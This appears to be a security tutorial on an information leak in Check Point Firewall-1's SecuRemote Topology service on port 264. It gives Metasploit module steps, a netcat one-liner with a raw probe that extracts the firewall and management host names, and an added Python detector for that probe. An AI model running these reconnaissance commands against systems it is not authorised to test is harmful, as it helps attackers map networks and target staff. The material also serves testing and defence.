Check Point Firewall - Port 264
Basic info
CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port 264/TCP to obtain critical details using publicly available tools and commands.
CheckPoint Firewall-1 includes a SecuRemote Topology service running on port 264/TCP, which allows unauthenticated queries. By interacting with this service, attackers can retrieve the firewall's hostname and the SmartCenter management station's name, potentially leading to further attacks.
The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.
Exploiting CheckPoint Firewall-1 with Metasploit
Metasploit provides a module that can interact with the firewall to extract its hostname and management station name.
Step 1: Load the Metasploit Module
Open Metasploit and load the auxiliary module:
use auxiliary/gather/checkpoint_hostname
Step 2: Set Target IP Address
Set the RHOST parameter to the target CheckPoint Firewall-1 instance:
set RHOST 10.10.10.10
Step 3: Execute the Module
Run the module to interact with the firewall:
run
If the firewall is vulnerable, the module will successfully contact the SecuRemote Topology service and return output similar to:
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
This confirms the presence of the firewall and exposes its internal naming conventions.
Alternative Method: Extracting Hostname and ICA Name Manually
If Metasploit is unavailable, a direct Netcat command can be used to query the firewall:
Step 1: Send Query via Netcat
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
Step 2: Analyze the Output
A successful query returns the firewall's certificate name (CN) and organization (O):
CN=Panama,O=MGMTT.srv.rxfrmi
These values can be used to gain insights into the firewall's identity and administrative domains.
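As an added defender-side example (not code from the original article), the same 23-byte request signature used above can be matched in captured traffic to port 264, and the CN/O pair the service answers with can be pulled out to inventory what a firewall exposes; the flow records and the response bytes are constructed, and the length-prefixed framing of the response is an assumption.

```python
import re

# Byte-for-byte signature of the unauthenticated topology request shown above:
# 4-byte command 0x51, 4-byte 0x21, 4-byte length 0x0b, then "securemote\0".
PROBE = b"\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00"
FW1_TOPOLOGY_PORT = 264
# The "CN=...,O=..." pair that the grep | cut pipeline above prints.
DN_RE = re.compile(rb"CN=([^,\x00]+),O=([^\x00]*)")


def is_topology_probe(payload: bytes) -> bool:
    """True if a client payload is the SecuRemote topology request."""
    return payload.startswith(PROBE)


def extract_dn(response: bytes) -> dict:
    """Return {"CN": ..., "O": ...} from a raw service response, or {} if
    no certificate name is present in it."""
    m = DN_RE.search(response)
    if not m:
        return {}
    return {"CN": m.group(1).decode(errors="replace"),
            "O": m.group(2).decode(errors="replace")}


def flag_flows(flows):
    """flows: iterable of (src, dst, dst_port, client_bytes, server_bytes).
    Returns one alert dict per flow that carries the probe on port 264."""
    alerts = []
    for src, dst, dport, req, resp in flows:
        if dport != FW1_TOPOLOGY_PORT or not is_topology_probe(req):
            continue
        alerts.append({"src": src, "dst": dst, "leaked": extract_dn(resp)})
    return alerts


# Constructed sample flows (not real captures). The first response mimics the
# answer shown in the article, preceded by an assumed 4-byte length field.
SAMPLE_FLOWS = [
    ("192.0.2.10", "192.0.2.1", 264, PROBE,
     b"\x00\x00\x00\x1cCN=Panama,O=MGMTT.srv.rxfrmi\x00"),
    ("192.0.2.11", "192.0.2.1", 264, b"GET / HTTP/1.0\r\n\r\n", b""),
    ("192.0.2.12", "192.0.2.1", 443, PROBE, b""),
]

if __name__ == "__main__":
    for alert in flag_flows(SAMPLE_FLOWS):
        print(alert)
```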